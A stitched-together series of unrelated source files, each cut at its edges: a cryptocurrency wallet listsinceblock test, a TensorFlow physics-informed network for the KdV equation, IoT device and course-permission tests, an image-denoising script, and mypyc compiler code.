signedtxres = self.nodes[2].signrawtransactionwithwallet(
self.nodes[2].createrawtransaction(utxo_dicts, recipient_dict))
assert signedtxres['complete']
signedtx = signedtxres['hex']
# send from nodes[1]; this will end up in aa1
txid1 = self.nodes[1].sendrawtransaction(signedtx)
# generate bb1-bb2 on right side
self.nodes[2].generate(2)
# send from nodes[2]; this will end up in bb3
txid2 = self.nodes[2].sendrawtransaction(signedtx)
assert_equal(txid1, txid2)
# generate on both sides
lastblockhash = self.nodes[1].generate(3)[2]
self.nodes[2].generate(2)
self.join_network()
self.sync_all()
# gettransaction should work for txid1
tx1 = self.nodes[0].gettransaction(txid1)
assert_equal(tx1['blockheight'], self.nodes[0].getblockheader(tx1['blockhash'])['height'])
# listsinceblock(lastblockhash) should now include txid1 in transactions
# as well as in removed
lsbres = self.nodes[0].listsinceblock(lastblockhash)
assert any(tx['txid'] == txid1 for tx in lsbres['transactions'])
assert any(tx['txid'] == txid1 for tx in lsbres['removed'])
# find transaction and ensure confirmations is valid
for tx in lsbres['transactions']:
if tx['txid'] == txid1:
assert_equal(tx['confirmations'], 2)
# the same check for the removed array; confirmations should STILL be 2
for tx in lsbres['removed']:
if tx['txid'] == txid1:
assert_equal(tx['confirmations'], 2)
def double_spends_filtered(self):
'''
`listsinceblock` was returning conflicted transactions even if they
occurred before the specified cutoff blockhash
'''
self.log.info("Test spends filtered")
spending_node = self.nodes[2]
dest_address = spending_node.getnewaddress()
tx_input = dict(
sequence=BIP125_SEQUENCE_NUMBER, **next(u for u in spending_node.listunspent()))
rawtx = spending_node.createrawtransaction(
[tx_input], {dest_address: tx_input["amount"] - Decimal("0.00051000"),
spending_node.getrawchangeaddress(): Decimal("0.00050000")})
signedtx = spending_node.signrawtransactionwithwallet(rawtx)
orig_tx_id = spending_node.sendrawtransaction(signedtx["hex"])
original_tx = spending_node.gettransaction(orig_tx_id)
double_tx = spending_node.bumpfee(orig_tx_id)
# check that both transactions exist
block_hash = spending_node.listsinceblock(
spending_node.getblockhash(spending_node.getblockcount()))
original_found = False
double_found = False
for tx in block_hash['transactions']:
if tx['txid'] == original_tx['txid']:
original_found = True
if tx['txid'] == double_tx['txid']:
double_found = True
assert_equal(original_found, True)
assert_equal(double_found, True)
lastblockhash = spending_node.generate(1)[0]
# check that neither transaction exists
block_hash = spending_node.listsinceblock(lastblockhash)
original_found = False
double_found = False
for tx in block_hash['transactions']:
if tx['txid'] == original_tx['txid']:
original_found = True
if tx['txid'] == double_tx['txid']:
double_found = True
assert_equal(original_found, False)
assert_equal(double_found, False)
if __name__ == '__main__':
ListSinceBlockTest().main()
|
the-stack_0_25915
|
"""
@author: Maziar Raissi
"""
import tensorflow as tf
import numpy as np
import matplotlib.pyplot as plt
import scipy.io
from scipy.interpolate import griddata
from mpl_toolkits.mplot3d import Axes3D
from pyDOE import lhs
import time
from plotting import newfig, savefig
import matplotlib.gridspec as gridspec
from mpl_toolkits.axes_grid1 import make_axes_locatable
###############################################################################
############################## Helper Functions ###############################
###############################################################################
def initialize_NN(layers):
weights = []
biases = []
num_layers = len(layers)
for l in range(0,num_layers-1):
W = xavier_init(size=[layers[l], layers[l+1]])
b = tf.Variable(tf.zeros([1,layers[l+1]]), dtype=tf.float32)
weights.append(W)
biases.append(b)
return weights, biases
def xavier_init(size):
in_dim = size[0]
out_dim = size[1]
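    # Xavier/Glorot initialization: stddev = sqrt(2 / (fan_in + fan_out))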
xavier_stddev = np.sqrt(2/(in_dim + out_dim))
return tf.Variable(tf.truncated_normal([in_dim, out_dim], stddev=xavier_stddev), dtype=tf.float32)
def neural_net(X, weights, biases):
num_layers = len(weights) + 1
H = X
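    # Hidden layers use tanh activations; the final layer is linear.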
for l in range(0,num_layers-2):
W = weights[l]
b = biases[l]
H = tf.tanh(tf.add(tf.matmul(H, W), b))
W = weights[-1]
b = biases[-1]
Y = tf.add(tf.matmul(H, W), b)
return Y
###############################################################################
################################ DeepHPM Class ################################
###############################################################################
class DeepHPM:
def __init__(self, t, x, u,
x0, u0, tb, X_f,
u_layers, pde_layers,
layers,
lb_idn, ub_idn,
lb_sol, ub_sol):
# Domain Boundary
self.lb_idn = lb_idn
self.ub_idn = ub_idn
self.lb_sol = lb_sol
self.ub_sol = ub_sol
# Init for Identification
self.idn_init(t, x, u, u_layers, pde_layers)
# Init for Solution
self.sol_init(x0, u0, tb, X_f, layers)
# tf session
self.sess = tf.Session(config=tf.ConfigProto(allow_soft_placement=True,
log_device_placement=True))
init = tf.global_variables_initializer()
self.sess.run(init)
###########################################################################
############################# Identifier ##################################
###########################################################################
def idn_init(self, t, x, u, u_layers, pde_layers):
# Training Data for Identification
self.t = t
self.x = x
self.u = u
# Layers for Identification
self.u_layers = u_layers
self.pde_layers = pde_layers
# Initialize NNs for Identification
self.u_weights, self.u_biases = initialize_NN(u_layers)
self.pde_weights, self.pde_biases = initialize_NN(pde_layers)
# tf placeholders for Identification
self.t_tf = tf.placeholder(tf.float32, shape=[None, 1])
self.x_tf = tf.placeholder(tf.float32, shape=[None, 1])
self.u_tf = tf.placeholder(tf.float32, shape=[None, 1])
self.terms_tf = tf.placeholder(tf.float32, shape=[None, pde_layers[0]])
# tf graphs for Identification
self.idn_u_pred = self.idn_net_u(self.t_tf, self.x_tf)
self.pde_pred = self.net_pde(self.terms_tf)
self.idn_f_pred = self.idn_net_f(self.t_tf, self.x_tf)
# loss for Identification
self.idn_u_loss = tf.reduce_sum(tf.square(self.idn_u_pred - self.u_tf))
self.idn_f_loss = tf.reduce_sum(tf.square(self.idn_f_pred))
# Optimizer for Identification
self.idn_u_optimizer = tf.contrib.opt.ScipyOptimizerInterface(self.idn_u_loss,
var_list = self.u_weights + self.u_biases,
method = 'L-BFGS-B',
options = {'maxiter': 50000,
'maxfun': 50000,
'maxcor': 50,
'maxls': 50,
'ftol': 1.0*np.finfo(float).eps})
self.idn_f_optimizer = tf.contrib.opt.ScipyOptimizerInterface(self.idn_f_loss,
var_list = self.pde_weights + self.pde_biases,
method = 'L-BFGS-B',
options = {'maxiter': 50000,
'maxfun': 50000,
'maxcor': 50,
'maxls': 50,
'ftol': 1.0*np.finfo(float).eps})
self.idn_u_optimizer_Adam = tf.train.AdamOptimizer()
self.idn_u_train_op_Adam = self.idn_u_optimizer_Adam.minimize(self.idn_u_loss,
var_list = self.u_weights + self.u_biases)
self.idn_f_optimizer_Adam = tf.train.AdamOptimizer()
self.idn_f_train_op_Adam = self.idn_f_optimizer_Adam.minimize(self.idn_f_loss,
var_list = self.pde_weights + self.pde_biases)
def idn_net_u(self, t, x):
X = tf.concat([t,x],1)
H = 2*(X - self.lb_idn)/(self.ub_idn - self.lb_idn) - 1
u = neural_net(H, self.u_weights, self.u_biases)
return u
def net_pde(self, terms):
pde = neural_net(terms, self.pde_weights, self.pde_biases)
return pde
def idn_net_f(self, t, x):
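        # PDE residual: f = u_t - N(u, u_x, u_xx, u_xxx), where N is the learned PDE network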
u = self.idn_net_u(t, x)
u_t = tf.gradients(u, t)[0]
u_x = tf.gradients(u, x)[0]
u_xx = tf.gradients(u_x, x)[0]
u_xxx = tf.gradients(u_xx, x)[0]
terms = tf.concat([u,u_x,u_xx,u_xxx],1)
f = u_t - self.net_pde(terms)
return f
def idn_u_train(self, N_iter):
tf_dict = {self.t_tf: self.t, self.x_tf: self.x, self.u_tf: self.u}
start_time = time.time()
for it in range(N_iter):
self.sess.run(self.idn_u_train_op_Adam, tf_dict)
# Print
if it % 10 == 0:
elapsed = time.time() - start_time
loss_value = self.sess.run(self.idn_u_loss, tf_dict)
print('It: %d, Loss: %.3e, Time: %.2f' %
(it, loss_value, elapsed))
start_time = time.time()
self.idn_u_optimizer.minimize(self.sess,
feed_dict = tf_dict,
fetches = [self.idn_u_loss],
loss_callback = self.callback)
def idn_f_train(self, N_iter):
tf_dict = {self.t_tf: self.t, self.x_tf: self.x}
start_time = time.time()
for it in range(N_iter):
self.sess.run(self.idn_f_train_op_Adam, tf_dict)
# Print
if it % 10 == 0:
elapsed = time.time() - start_time
loss_value = self.sess.run(self.idn_f_loss, tf_dict)
print('It: %d, Loss: %.3e, Time: %.2f' %
(it, loss_value, elapsed))
start_time = time.time()
self.idn_f_optimizer.minimize(self.sess,
feed_dict = tf_dict,
fetches = [self.idn_f_loss],
loss_callback = self.callback)
def idn_predict(self, t_star, x_star):
tf_dict = {self.t_tf: t_star, self.x_tf: x_star}
u_star = self.sess.run(self.idn_u_pred, tf_dict)
f_star = self.sess.run(self.idn_f_pred, tf_dict)
return u_star, f_star
def predict_pde(self, terms_star):
tf_dict = {self.terms_tf: terms_star}
pde_star = self.sess.run(self.pde_pred, tf_dict)
return pde_star
###########################################################################
############################### Solver ####################################
###########################################################################
def sol_init(self, x0, u0, tb, X_f, layers):
# Training Data for Solution
X0 = np.concatenate((0*x0, x0), 1) # (0, x0)
X_lb = np.concatenate((tb, 0*tb + self.lb_sol[1]), 1) # (tb, lb[1])
X_ub = np.concatenate((tb, 0*tb + self.ub_sol[1]), 1) # (tb, ub[1])
self.X_f = X_f # Collocation Points
self.t0 = X0[:,0:1] # Initial Data (time)
self.x0 = X0[:,1:2] # Initial Data (space)
self.t_lb = X_lb[:,0:1] # Boundary Data (time) -- lower boundary
self.x_lb = X_lb[:,1:2] # Boundary Data (space) -- lower boundary
self.t_ub = X_ub[:,0:1] # Boundary Data (time) -- upper boundary
self.x_ub = X_ub[:,1:2] # Boundary Data (space) -- upper boundary
self.t_f = X_f[:,0:1] # Collocation Points (time)
self.x_f = X_f[:,1:2] # Collocation Points (space)
self.u0 = u0 # Boundary Data
# Layers for Solution
self.layers = layers
# Initialize NNs for Solution
self.weights, self.biases = initialize_NN(layers)
# tf placeholders for Solution
self.t0_tf = tf.placeholder(tf.float32, shape=[None, 1])
self.x0_tf = tf.placeholder(tf.float32, shape=[None, 1])
self.u0_tf = tf.placeholder(tf.float32, shape=[None, 1])
self.t_lb_tf = tf.placeholder(tf.float32, shape=[None, 1])
self.x_lb_tf = tf.placeholder(tf.float32, shape=[None, 1])
self.t_ub_tf = tf.placeholder(tf.float32, shape=[None, 1])
self.x_ub_tf = tf.placeholder(tf.float32, shape=[None, 1])
self.t_f_tf = tf.placeholder(tf.float32, shape=[None, 1])
self.x_f_tf = tf.placeholder(tf.float32, shape=[None, 1])
# tf graphs for Solution
self.u0_pred, _, _ = self.sol_net_u(self.t0_tf, self.x0_tf)
self.u_lb_pred, self.u_x_lb_pred, self.u_xx_lb_pred = self.sol_net_u(self.t_lb_tf, self.x_lb_tf)
self.u_ub_pred, self.u_x_ub_pred, self.u_xx_ub_pred = self.sol_net_u(self.t_ub_tf, self.x_ub_tf)
self.sol_f_pred = self.sol_net_f(self.t_f_tf, self.x_f_tf)
# loss for Solution
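        # = initial-condition mismatch + periodic boundary terms (u, u_x, u_xx) + PDE residual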
self.sol_loss = tf.reduce_sum(tf.square(self.u0_tf - self.u0_pred)) + \
tf.reduce_sum(tf.square(self.u_lb_pred - self.u_ub_pred)) + \
tf.reduce_sum(tf.square(self.u_x_lb_pred - self.u_x_ub_pred)) + \
tf.reduce_sum(tf.square(self.u_xx_lb_pred - self.u_xx_ub_pred)) + \
tf.reduce_sum(tf.square(self.sol_f_pred))
# Optimizer for Solution
self.sol_optimizer = tf.contrib.opt.ScipyOptimizerInterface(self.sol_loss,
var_list = self.weights + self.biases,
method = 'L-BFGS-B',
options = {'maxiter': 50000,
'maxfun': 50000,
'maxcor': 50,
'maxls': 50,
'ftol': 1.0*np.finfo(float).eps})
self.sol_optimizer_Adam = tf.train.AdamOptimizer()
self.sol_train_op_Adam = self.sol_optimizer_Adam.minimize(self.sol_loss,
var_list = self.weights + self.biases)
def sol_net_u(self, t, x):
X = tf.concat([t,x],1)
H = 2*(X - self.lb_sol)/(self.ub_sol - self.lb_sol) - 1
u = neural_net(H, self.weights, self.biases)
u_x = tf.gradients(u, x)[0]
u_xx = tf.gradients(u_x, x)[0]
return u, u_x, u_xx
def sol_net_f(self, t, x):
u, u_x, u_xx = self.sol_net_u(t,x)
u_t = tf.gradients(u, t)[0]
u_xxx = tf.gradients(u_xx, x)[0]
terms = tf.concat([u,u_x,u_xx,u_xxx],1)
f = u_t - self.net_pde(terms)
return f
def callback(self, loss):
print('Loss: %e' % (loss))
def sol_train(self, N_iter):
tf_dict = {self.t0_tf: self.t0, self.x0_tf: self.x0,
self.u0_tf: self.u0,
self.t_lb_tf: self.t_lb, self.x_lb_tf: self.x_lb,
self.t_ub_tf: self.t_ub, self.x_ub_tf: self.x_ub,
self.t_f_tf: self.t_f, self.x_f_tf: self.x_f}
start_time = time.time()
for it in range(N_iter):
self.sess.run(self.sol_train_op_Adam, tf_dict)
# Print
if it % 10 == 0:
elapsed = time.time() - start_time
loss_value = self.sess.run(self.sol_loss, tf_dict)
print('It: %d, Loss: %.3e, Time: %.2f' %
(it, loss_value, elapsed))
start_time = time.time()
self.sol_optimizer.minimize(self.sess,
feed_dict = tf_dict,
fetches = [self.sol_loss],
loss_callback = self.callback)
def sol_predict(self, t_star, x_star):
u_star = self.sess.run(self.u0_pred, {self.t0_tf: t_star, self.x0_tf: x_star})
f_star = self.sess.run(self.sol_f_pred, {self.t_f_tf: t_star, self.x_f_tf: x_star})
return u_star, f_star
###############################################################################
################################ Main Function ################################
###############################################################################
if __name__ == "__main__":
    # Domain bounds
lb_idn = np.array([0.0, -20.0])
ub_idn = np.array([40.0, 20.0])
lb_sol = np.array([0.0, -20.0])
ub_sol = np.array([40.0, 20.0])
### Load Data ###
data_idn = scipy.io.loadmat('../Data/KdV_sine.mat')
t_idn = data_idn['t'].flatten()[:,None]
x_idn = data_idn['x'].flatten()[:,None]
Exact_idn = np.real(data_idn['usol'])
T_idn, X_idn = np.meshgrid(t_idn,x_idn)
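    # Keep only the first two-thirds of the time domain for identification;
    # the remainder is held out to test extrapolation.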
keep = 2/3
index = int(keep*t_idn.shape[0])
T_idn = T_idn[:,0:index]
X_idn = X_idn[:,0:index]
Exact_idn = Exact_idn[:,0:index]
t_idn_star = T_idn.flatten()[:,None]
x_idn_star = X_idn.flatten()[:,None]
X_idn_star = np.hstack((t_idn_star, x_idn_star))
u_idn_star = Exact_idn.flatten()[:,None]
#
data_sol = scipy.io.loadmat('../Data/KdV_sine.mat')
t_sol = data_sol['t'].flatten()[:,None]
x_sol = data_sol['x'].flatten()[:,None]
Exact_sol = np.real(data_sol['usol'])
T_sol, X_sol = np.meshgrid(t_sol,x_sol)
t_sol_star = T_sol.flatten()[:,None]
x_sol_star = X_sol.flatten()[:,None]
X_sol_star = np.hstack((t_sol_star, x_sol_star))
u_sol_star = Exact_sol.flatten()[:,None]
### Training Data ###
# For identification
N_train = 10000
idx = np.random.choice(t_idn_star.shape[0], N_train, replace=False)
t_train = t_idn_star[idx,:]
x_train = x_idn_star[idx,:]
u_train = u_idn_star[idx,:]
noise = 0.00
u_train = u_train + noise*np.std(u_train)*np.random.randn(u_train.shape[0], u_train.shape[1])
# For solution
N0 = Exact_sol.shape[0]
N_b = Exact_sol.shape[1]
N_f = 20000
idx_x = np.random.choice(x_sol.shape[0], N0, replace=False)
x0_train = x_sol[idx_x,:]
u0_train = Exact_sol[idx_x,0:1]
idx_t = np.random.choice(t_sol.shape[0], N_b, replace=False)
tb_train = t_sol[idx_t,:]
X_f_train = lb_sol + (ub_sol-lb_sol)*lhs(2, N_f)
# Layers
u_layers = [2, 50, 50, 50, 50, 1]
pde_layers = [4, 100, 100, 1]
layers = [2, 50, 50, 50, 50, 1]
# Model
model = DeepHPM(t_train, x_train, u_train,
x0_train, u0_train, tb_train, X_f_train,
u_layers, pde_layers,
layers,
lb_idn, ub_idn,
lb_sol, ub_sol)
# Train the identifier
model.idn_u_train(N_iter=0)
model.idn_f_train(N_iter=0)
u_pred_identifier, f_pred_identifier = model.idn_predict(t_idn_star, x_idn_star)
error_u_identifier = np.linalg.norm(u_idn_star-u_pred_identifier,2)/np.linalg.norm(u_idn_star,2)
print('Error u: %e' % (error_u_identifier))
### Solution ###
# Train the solver
model.sol_train(N_iter=0)
u_pred, f_pred = model.sol_predict(t_sol_star, x_sol_star)
u_pred_idn, f_pred_idn = model.sol_predict(t_idn_star, x_idn_star)
error_u = np.linalg.norm(u_sol_star-u_pred,2)/np.linalg.norm(u_sol_star,2)
error_u_idn = np.linalg.norm(u_idn_star-u_pred_idn,2)/np.linalg.norm(u_idn_star,2)
print('Error u: %e' % (error_u))
print('Error u (idn): %e' % (error_u_idn))
U_pred = griddata(X_sol_star, u_pred.flatten(), (T_sol, X_sol), method='cubic')
######################################################################
############################# Plotting ###############################
######################################################################
fig, ax = newfig(1.0, 0.6)
ax.axis('off')
    ######## Left panel: exact dynamics ###########
gs = gridspec.GridSpec(1, 2)
gs.update(top=0.8, bottom=0.2, left=0.1, right=0.9, wspace=0.5)
ax = plt.subplot(gs[:, 0])
h = ax.imshow(Exact_sol, interpolation='nearest', cmap='jet',
extent=[lb_sol[0], ub_sol[0], lb_sol[1], ub_sol[1]],
origin='lower', aspect='auto')
divider = make_axes_locatable(ax)
cax = divider.append_axes("right", size="5%", pad=0.05)
fig.colorbar(h, cax=cax)
ax.set_xlabel('$t$')
ax.set_ylabel('$x$')
#ax.set_aspect('equal', 'box')
ax.set_title('Exact Dynamics', fontsize = 10)
line = np.linspace(lb_sol[1], ub_sol[1], 2)[:,None]
ax.plot(t_idn[index]*np.ones((2,1)), line, 'w-', linewidth = 1)
    ######## Right panel: learned dynamics ###########
ax = plt.subplot(gs[:, 1])
h = ax.imshow(U_pred, interpolation='nearest', cmap='jet',
extent=[lb_sol[0], ub_sol[0], lb_sol[1], ub_sol[1]],
origin='lower', aspect='auto')
divider = make_axes_locatable(ax)
cax = divider.append_axes("right", size="5%", pad=0.05)
fig.colorbar(h, cax=cax)
ax.set_xlabel('$t$')
ax.set_ylabel('$x$')
#ax.set_aspect('equal', 'box')
ax.set_title('Learned Dynamics', fontsize = 10)
line = np.linspace(lb_sol[1], ub_sol[1], 2)[:,None]
ax.plot(t_idn[index]*np.ones((2,1)), line, 'w-', linewidth = 1)
# savefig('./figures/KdV_Extrapolate')
|
the-stack_0_25917
|
import os
from aiohttp import web
from aiohttp.test_utils import AioHTTPTestCase, unittest_run_loop
from meross_iot.controller.mixins.toggle import ToggleXMixin
from meross_iot.manager import MerossManager
from meross_iot.model.enums import OnlineStatus
from tests import async_get_client
if os.name == 'nt':
import asyncio
asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())
else:
import asyncio
class TestPushNotificationHandler(AioHTTPTestCase):
async def get_application(self):
return web.Application()
async def setUpAsync(self):
# Wait some time before next test-burst
await asyncio.sleep(10)
self.meross_client, self.requires_logout = await async_get_client()
# Look for a device to be used for this test
self.meross_manager = MerossManager(http_client=self.meross_client)
await self.meross_manager.async_init()
devices = await self.meross_manager.async_device_discovery()
toggle_devices = self.meross_manager.find_devices(device_class=ToggleXMixin, online_status=OnlineStatus.ONLINE)
if len(toggle_devices) < 1:
self.test_device = None
else:
self.test_device = toggle_devices[0]
@unittest_run_loop
async def test_dev_push_notification(self):
if self.test_device is None:
self.skipTest("No ToggleX device has been found to run this test on.")
return
# Set the toggle device to ON state
await self.test_device.async_turn_on()
# Create a new manager
new_meross_client, requires_logout = await async_get_client()
m = None
try:
# Retrieve the same device with another manager
m = MerossManager(http_client=new_meross_client)
await m.async_init()
await m.async_device_discovery()
devs = m.find_devices(device_uuids=(self.test_device.uuid,))
dev = devs[0]
e = asyncio.Event()
# Define the coroutine for handling push notification
async def my_coro(namespace, data, device_internal_id):
e.set()
dev.register_push_notification_handler_coroutine(my_coro)
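            # Toggling the device off via the original manager should trigger a push
            # notification on the second manager's connection within 5 seconds.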
await self.test_device.async_turn_off()
await asyncio.wait_for(e.wait(), 5.0)
finally:
if m is not None:
m.close()
if requires_logout:
await new_meross_client.async_logout()
async def tearDownAsync(self):
if self.requires_logout:
await self.meross_client.async_logout()
|
the-stack_0_25918
|
# from denoise_image.config import *
from denoise_image.config import denoise_image_config as config
from denoise_image.pyimagesearch.denoising.helper import blur_and_threshold
from imutils import paths
import pickle
import cv2
# load the model
model = pickle.loads(open(config.MODEL_PATH, "rb").read())
img_path = 'denoise_image/dirty-documents/test/61.png'
def denoise(img_path):
img = cv2.imread(img_path)
img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
copy = img.copy()
# add padding
img = cv2.copyMakeBorder(img, 2, 2, 2, 2, cv2.BORDER_REPLICATE)
img = blur_and_threshold(img)
region_features = []
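    # Slide a 5x5 window over the padded image; each flattened window is one
    # feature vector for the pixel-level denoising model.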
for y in range(0, img.shape[0]):
for x in range(0, img.shape[1]):
# extract the region
region = img[y:y+5, x:x+5]
(rH, rW) = region.shape[:2]
# continue if region is not 5x5
if rW != 5 or rH != 5:
continue
# flatten the region values
features = region.flatten()
region_features.append(features)
# predict the image
pixels = model.predict(region_features)
# reshape the image as per original image size
pixels = pixels.reshape(copy.shape)
# change values between 0 and 255
output = (pixels * 255).astype("uint8")
return output
# cv2.imshow('original', copy)
# cv2.waitKey(0)
# cv2.imshow('clean', output)
# cv2.waitKey(0)
# cv2.destroyAllWindows()
# cv2.imwrite('61.png', output)
|
the-stack_0_25920
|
# -*- coding: utf-8 -*-
"""
Tests for the CAG API ViewSets.
"""
import pytest
from course_access_groups.permissions import CommonAuthMixin
from course_access_groups.views import CourseAccessGroupViewSet
from test_utils import get_api_view_classes
class TestCommonAuthMixinUsage:
"""
Ensure the CommonAuthMixin is used by APIs.
"""
def test_sanity_check(self):
"""
Ensure that `api_view_classes` contains the correct classes.
A sanity check just in case the `get_api_view_classes` helper is incorrect.
"""
api_view_classes = get_api_view_classes()
        assert api_view_classes, 'Expected the helper to discover API view classes.'
assert CourseAccessGroupViewSet in api_view_classes
@pytest.mark.parametrize('api_view_class', get_api_view_classes())
def test_common_auth_mixin_used(self, api_view_class):
"""
Ensure CommonAuthMixin is used on all API ViewSets.
:param api_view_class: An API view class e.g. MembershipRuleViewSet
`get_api_view_classes()` auto discovers the following views:
- CourseAccessGroupViewSet
- MemberViewSet
- MembershipRuleViewSet
- GroupCourseViewSet
- in addition to any other future class
"""
assert issubclass(api_view_class, CommonAuthMixin), 'Permissions: {cls} should inherit from {parent}'.format(
cls=api_view_class.__name__,
parent=CommonAuthMixin.__name__,
)
|
the-stack_0_25925
|
"""Transform mypy expression ASTs to mypyc IR (Intermediate Representation).
The top-level AST transformation logic is implemented in mypyc.irbuild.visitor
and mypyc.irbuild.builder.
"""
from typing import List, Optional, Union, Callable, cast
from mypy.nodes import (
Expression, NameExpr, MemberExpr, SuperExpr, CallExpr, UnaryExpr, OpExpr, IndexExpr,
ConditionalExpr, ComparisonExpr, IntExpr, FloatExpr, ComplexExpr, StrExpr,
BytesExpr, EllipsisExpr, ListExpr, TupleExpr, DictExpr, SetExpr, ListComprehension,
SetComprehension, DictionaryComprehension, SliceExpr, GeneratorExpr, CastExpr, StarExpr,
AssignmentExpr, AssertTypeExpr,
Var, RefExpr, MypyFile, TypeInfo, TypeApplication, LDEF, ARG_POS
)
from mypy.types import TupleType, Instance, TypeType, ProperType, get_proper_type
from mypyc.common import MAX_SHORT_INT
from mypyc.ir.ops import (
Value, Register, TupleGet, TupleSet, BasicBlock, Assign, LoadAddress, RaiseStandardError
)
from mypyc.ir.rtypes import (
RTuple, object_rprimitive, is_none_rprimitive, int_rprimitive, is_int_rprimitive
)
from mypyc.ir.func_ir import FUNC_CLASSMETHOD, FUNC_STATICMETHOD
from mypyc.irbuild.format_str_tokenizer import (
tokenizer_printf_style, join_formatted_strings, convert_format_expr_to_str,
convert_format_expr_to_bytes, join_formatted_bytes
)
from mypyc.primitives.bytes_ops import bytes_slice_op
from mypyc.primitives.registry import CFunctionDescription, builtin_names
from mypyc.primitives.generic_ops import iter_op
from mypyc.primitives.misc_ops import new_slice_op, ellipsis_op, type_op, get_module_dict_op
from mypyc.primitives.list_ops import list_append_op, list_extend_op, list_slice_op
from mypyc.primitives.tuple_ops import list_tuple_op, tuple_slice_op
from mypyc.primitives.dict_ops import dict_new_op, dict_set_item_op, dict_get_item_op
from mypyc.primitives.set_ops import set_add_op, set_update_op
from mypyc.primitives.str_ops import str_slice_op
from mypyc.primitives.int_ops import int_comparison_op_mapping
from mypyc.irbuild.specialize import apply_function_specialization, apply_method_specialization
from mypyc.irbuild.builder import IRBuilder
from mypyc.irbuild.for_helpers import (
translate_list_comprehension, translate_set_comprehension,
comprehension_helper
)
from mypyc.irbuild.constant_fold import constant_fold_expr
# Name and attribute references
def transform_name_expr(builder: IRBuilder, expr: NameExpr) -> Value:
if expr.node is None:
builder.add(RaiseStandardError(RaiseStandardError.RUNTIME_ERROR,
"mypyc internal error: should be unreachable",
expr.line))
return builder.none()
fullname = expr.node.fullname
if fullname in builtin_names:
typ, src = builtin_names[fullname]
return builder.add(LoadAddress(typ, src, expr.line))
# special cases
if fullname == 'builtins.None':
return builder.none()
if fullname == 'builtins.True':
return builder.true()
if fullname == 'builtins.False':
return builder.false()
if isinstance(expr.node, Var) and expr.node.is_final:
value = builder.emit_load_final(
expr.node,
fullname,
expr.name,
builder.is_native_ref_expr(expr),
builder.types[expr],
expr.line,
)
if value is not None:
return value
if isinstance(expr.node, MypyFile) and expr.node.fullname in builder.imports:
return builder.load_module(expr.node.fullname)
# If the expression is locally defined, then read the result from the corresponding
# assignment target and return it. Otherwise if the expression is a global, load it from
# the globals dictionary.
# Except for imports, that currently always happens in the global namespace.
if expr.kind == LDEF and not (isinstance(expr.node, Var)
and expr.node.is_suppressed_import):
# Try to detect and error when we hit the irritating mypy bug
# where a local variable is cast to None. (#5423)
if (isinstance(expr.node, Var) and is_none_rprimitive(builder.node_type(expr))
and expr.node.is_inferred):
builder.error(
'Local variable "{}" has inferred type None; add an annotation'.format(
expr.node.name),
expr.node.line)
# TODO: Behavior currently only defined for Var, FuncDef and MypyFile node types.
if isinstance(expr.node, MypyFile):
# Load reference to a module imported inside function from
# the modules dictionary. It would be closer to Python
# semantics to access modules imported inside functions
# via local variables, but this is tricky since the mypy
# AST doesn't include a Var node for the module. We
# instead load the module separately on each access.
mod_dict = builder.call_c(get_module_dict_op, [], expr.line)
obj = builder.call_c(dict_get_item_op,
[mod_dict, builder.load_str(expr.node.fullname)],
expr.line)
return obj
else:
return builder.read(builder.get_assignment_target(expr), expr.line)
return builder.load_global(expr)
def transform_member_expr(builder: IRBuilder, expr: MemberExpr) -> Value:
# First check if this is maybe a final attribute.
final = builder.get_final_ref(expr)
if final is not None:
fullname, final_var, native = final
value = builder.emit_load_final(final_var, fullname, final_var.name, native,
builder.types[expr], expr.line)
if value is not None:
return value
if isinstance(expr.node, MypyFile) and expr.node.fullname in builder.imports:
return builder.load_module(expr.node.fullname)
obj = builder.accept(expr.expr)
rtype = builder.node_type(expr)
# Special case: for named tuples transform attribute access to faster index access.
typ = get_proper_type(builder.types.get(expr.expr))
if isinstance(typ, TupleType) and typ.partial_fallback.type.is_named_tuple:
fields = typ.partial_fallback.type.metadata['namedtuple']['fields']
if expr.name in fields:
index = builder.builder.load_int(fields.index(expr.name))
return builder.gen_method_call(obj, '__getitem__', [index], rtype, expr.line)
check_instance_attribute_access_through_class(builder, expr, typ)
return builder.builder.get_attr(obj, expr.name, rtype, expr.line)
def check_instance_attribute_access_through_class(builder: IRBuilder,
expr: MemberExpr,
typ: Optional[ProperType]) -> None:
"""Report error if accessing an instance attribute through class object."""
if isinstance(expr.expr, RefExpr):
node = expr.expr.node
if isinstance(typ, TypeType) and isinstance(typ.item, Instance):
# TODO: Handle other item types
node = typ.item.type
if isinstance(node, TypeInfo):
class_ir = builder.mapper.type_to_ir.get(node)
if class_ir is not None and class_ir.is_ext_class:
sym = node.get(expr.name)
if (sym is not None
and isinstance(sym.node, Var)
and not sym.node.is_classvar
and not sym.node.is_final):
builder.error(
'Cannot access instance attribute "{}" through class object'.format(
expr.name),
expr.line
)
builder.note(
'(Hint: Use "x: Final = ..." or "x: ClassVar = ..." to define '
'a class attribute)',
expr.line
)
def transform_super_expr(builder: IRBuilder, o: SuperExpr) -> Value:
# warning(builder, 'can not optimize super() expression', o.line)
sup_val = builder.load_module_attr_by_fullname('builtins.super', o.line)
if o.call.args:
args = [builder.accept(arg) for arg in o.call.args]
else:
assert o.info is not None
typ = builder.load_native_type_object(o.info.fullname)
ir = builder.mapper.type_to_ir[o.info]
iter_env = iter(builder.builder.args)
# Grab first argument
vself: Value = next(iter_env)
if builder.fn_info.is_generator:
# grab sixth argument (see comment in translate_super_method_call)
self_targ = list(builder.symtables[-1].values())[6]
vself = builder.read(self_targ, builder.fn_info.fitem.line)
elif not ir.is_ext_class:
vself = next(iter_env) # second argument is self if non_extension class
args = [typ, vself]
res = builder.py_call(sup_val, args, o.line)
return builder.py_get_attr(res, o.name, o.line)
# Calls
def transform_call_expr(builder: IRBuilder, expr: CallExpr) -> Value:
if isinstance(expr.analyzed, CastExpr):
return translate_cast_expr(builder, expr.analyzed)
elif isinstance(expr.analyzed, AssertTypeExpr):
# Compile to a no-op.
return builder.accept(expr.analyzed.expr)
callee = expr.callee
if isinstance(callee, IndexExpr) and isinstance(callee.analyzed, TypeApplication):
callee = callee.analyzed.expr # Unwrap type application
if isinstance(callee, MemberExpr):
return apply_method_specialization(builder, expr, callee) or \
translate_method_call(builder, expr, callee)
elif isinstance(callee, SuperExpr):
return translate_super_method_call(builder, expr, callee)
else:
return translate_call(builder, expr, callee)
def translate_call(builder: IRBuilder, expr: CallExpr, callee: Expression) -> Value:
# The common case of calls is refexprs
if isinstance(callee, RefExpr):
return apply_function_specialization(builder, expr, callee) or \
translate_refexpr_call(builder, expr, callee)
function = builder.accept(callee)
args = [builder.accept(arg) for arg in expr.args]
